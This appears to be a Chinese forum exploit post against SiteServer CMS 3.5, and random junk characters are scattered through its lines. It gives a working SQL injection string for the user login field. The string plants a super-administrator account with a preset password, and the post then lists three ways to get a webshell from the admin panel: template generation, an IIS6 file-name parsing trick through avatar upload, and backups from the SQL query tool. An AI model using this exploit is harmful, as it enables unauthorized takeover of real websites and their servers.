经测试秒杀最新的3.5版; Z( t8 o1 W" X2 r
stieserver官网:www.siteserver.cn
. A- D: ~2 U$ kEXP: Y! {; x8 m" G( C
直接访问UserCenter/login.aspx" D, G8 f" r% G3 `7 D
用户名处输入:
3 \5 {3 Z5 {2 M8 Y3 z% k+ ^2 G
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–6 @$ M7 ^2 I `" O# f4 e1 Y4 h
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
. S' ]5 Z9 G0 f0 q; U8 G" P之后再访问后台SiteServer/login.aspx用插入的用户登陆, ^# M% \7 O+ E2 q7 `
后台拿webshell的三种方法:. _1 y! [. z' V7 \
一、
; a6 s* a, a2 O6 E8 O3 C站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
. |$ y9 Q, O e5 Z二、
7 ?4 {; {7 k% q3 {7 s7 V: b成员权限-》添加用户-》用户名为:1.asp9 @' N7 @: V+ z7 x. e) }
http://127.0.0.1/usercenter/1 h9 h2 G! N7 P% y: h7 |% G
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
) ]8 g s3 @0 r8 q; {(ps:后台添加用户时不会验证是否含有非法字符)
# s( n1 g2 Q; {5 q, H9 Z三、
) Q6 a6 E% y# k% W( I系统工具-》实用工具-》机器参数查看
. h: h- |+ a. \2 H' q2 Y可以看到数据库类型、名称,WEB路径
3 ^, h4 z3 X3 c+ O系统工具-》数据库工具-》SQL语句查询
) P4 @. W4 q. w) D这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |